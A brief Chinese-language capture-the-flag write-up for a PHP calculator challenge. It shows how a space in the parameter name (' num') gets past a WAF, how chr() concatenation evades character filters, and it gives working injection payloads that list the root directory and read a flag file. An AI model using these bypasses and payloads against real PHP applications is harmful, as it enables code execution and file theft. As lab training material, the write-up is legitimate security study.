简简单单php:
直接看源码
进入calc.php
php字符串解析时会自动将空格转化。可以通过打空格的方式修改变量名来绕过waf。
这里指出了waf不一定用php写的,所以产生了这个漏洞。
用scandir()来列出参数目录中的文件和目录
这里也过滤了一些字符
过滤的字符我们可以使用chr()来绕过,/的ascii码是47
var_dump是打印这里可以用print_r平替
var_dump(scandir(chr(47)))
最终语句
calc.php? num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
一个小知识点chr()之间的“ . ”是将chr()拼接起来